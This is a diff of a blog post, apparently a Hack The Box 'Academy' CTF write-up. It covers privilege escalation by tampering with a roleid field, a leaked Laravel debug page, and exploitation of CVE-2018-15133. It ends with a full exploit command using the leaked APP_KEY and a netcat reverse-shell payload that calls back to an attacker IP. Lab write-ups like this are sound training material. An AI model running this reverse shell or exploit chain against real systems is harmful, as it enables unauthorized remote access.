davi-cruz/davi-cruz.github.io/_i18n/en-US/_posts/2021-02-17-htb-academy.md

 ### admin.php

-Accessing `admin.php` noticed that this pace looks very similar to the previous one, but our dummy credentials didn't worked there.
-So remembering from the parameter we saw in the registration form (**roleid**), I decided to create another account but in this case tampering the data sent in the request, replacing 0 by 1 for the mentioned identifier.
+Accessing `admin.php` noticed that this pace looks very similar to the previous one, but our dummy credentials did not work there.
+So, remembering from the parameter we saw in the registration form (**roleid**), I decided to create another account but, in this case, tampering the data sent in the request, replacing 0 by 1 for the mentioned identifier.
 With this new account, which roleid = **1**, I was able to login to the restricted area and the page below was displayed:

 ![image-20210217131705459](https://i.imgur.com/s54Fy4z.png){: .align-center}

 Besides not existing any information hidden in the source code of this page, what called attention was the host **dev-staging-01.academy.htb** which might also be running in this box.

-After adding it to the hosts file under the same IP, the page below was shown, which is a error handler framework for PHP, which allows developers to debug code in their code, but in this case was open and leaking lots of information such as credentials and environment variables.
+After adding it to the hosts file under the same IP, the page below was shown, which is an error handler framework for PHP, which allows developers to debug code in their code, but in this case was open and leaking lots of information such as credentials and environment variables.

 ![image-20210217132525919](https://i.imgur.com/EdXyUeb.png){: .align-center}

 What most called attention in the information leaked was the MySQL credentials and Laravel App_key, which might lead us to an initial foothold in this box.

 ## Initial Foothold
-As we don't have MySQL 3306/TCP open in this box, based on the initial nmap scan, searching a little about what could be done by using the Laravel App_key I came across the [CVE-2018-15133](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15133) which can lead to RCE through an unserialize call in some affected Laravel versions.
+As we don't have MySQL 3306/TCP open in this box, based on the initial nmap scan, searching a little about what could be done by using the Laravel App_key I came across the [CVE-2018-15133](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15133) which can lead to RCE through an unserialized call in some affected Laravel versions.
 If we were lucky this might work for this box :smiley:.

-Doing some search I have found [this repository](https://github.com/aljavier/exploit_laravel_cve-2018-15133) which implements this exploit in a simple manner, which was the one I have used to get an initial foothold in the box.
+Doing some search, I have found [this repository](https://github.com/aljavier/exploit_laravel_cve-2018-15133) which implements this exploit in a simple manner, which was the one I have used to get an initial foothold in the box.

 ```
 $ python3 ./pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f"